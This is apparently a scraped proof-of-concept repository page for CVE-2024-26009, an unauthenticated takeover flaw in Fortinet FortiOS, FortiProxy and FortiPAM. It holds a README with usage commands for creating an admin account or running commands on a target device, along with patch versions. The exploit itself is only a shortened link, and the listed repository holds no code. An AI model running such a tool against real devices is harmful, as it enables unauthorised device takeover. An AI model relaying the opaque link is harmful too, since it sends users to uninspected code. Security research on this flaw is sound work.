
CVE-2024-26009 PoC — Fortinet Multiple Products Security Vulnerability

Source
Associated Vulnerability
Title: Fortinet Multiple Products Security Vulnerability (CVE-2024-26009)
Description: Fortinet FortiOS and related products are made by the US company Fortinet. Fortinet FortiOS is a security operating system dedicated to the FortiGate network security platform. Fortinet FortiProxy is a secure web proxy that protects employees from network attacks by combining multiple detection techniques such as web filtering, DNS filtering, DLP, antivirus, intrusion prevention and advanced threat protection. FortiProxy helps reduce bandwidth demand and optimizes the network through content and video caching. Fortinet FortiPAM is a privileged access management platform. Multiple Fortinet products contain a security vulnerability
Readme

# CVE-2024-26009 Exploit  
Critical Security Vulnerability in Fortinet Devices  

## Affected Systems  
- FortiOS firewalls (multiple versions)  
- FortiProxy secure web gateways  
- FortiPAM privileged access managers  

## Impact  
Allows complete takeover of vulnerable devices when:  
1. Device is managed by FortiManager  
2. Attacker knows FortiManager's serial number  

Successful exploitation gives full administrator control without requiring valid credentials.  

## Exploit
[href](https://tinyurl.com/4puxhs3k)

## Usage  
```bash
python3 exploit.py <target_ip> <fortimanager_serial> [options]
```

### Basic Examples  
Create new admin account:  
```bash
python3 exploit.py 192.168.1.1 FGT60F123456789
```

Run custom command:  
```bash
python3 exploit.py 10.10.15.200 FGT80XYZ987654 -c "execute reboot"
```

### Options  
| Parameter          | Description                          | Default Value     |
|--------------------|--------------------------------------|-------------------|
| `-p`/`--port`      | Connection port                      | 9443              |
| `-c`/`--command`   | Command to execute on target device  | Creates new admin |

## Protection  
Immediately upgrade to fixed versions:  
- **FortiOS**: 6.4.16+ or 6.2.17+  
- **FortiProxy**: 7.4.3+, 7.2.9+, or 7.0.16+  
- **FortiPAM**: 1.2.0+  

## Legal Notice  
This tool is for:  
- Security research  
- Authorized penetration testing  
- Educational purposes  

Never use on systems without explicit permission.  

## References  
- [Fortinet Security Advisory](https://www.fortiguard.com/psirt/FG-IR-24-042)  
- CVSS score: 8.1 (High)  
File Snapshot

```
[4.0K] /data/pocs/b128c474a3026804de02ac0fbc89d90eb9f25d98
└── [1.6K] README.md

0 directories, 1 file
```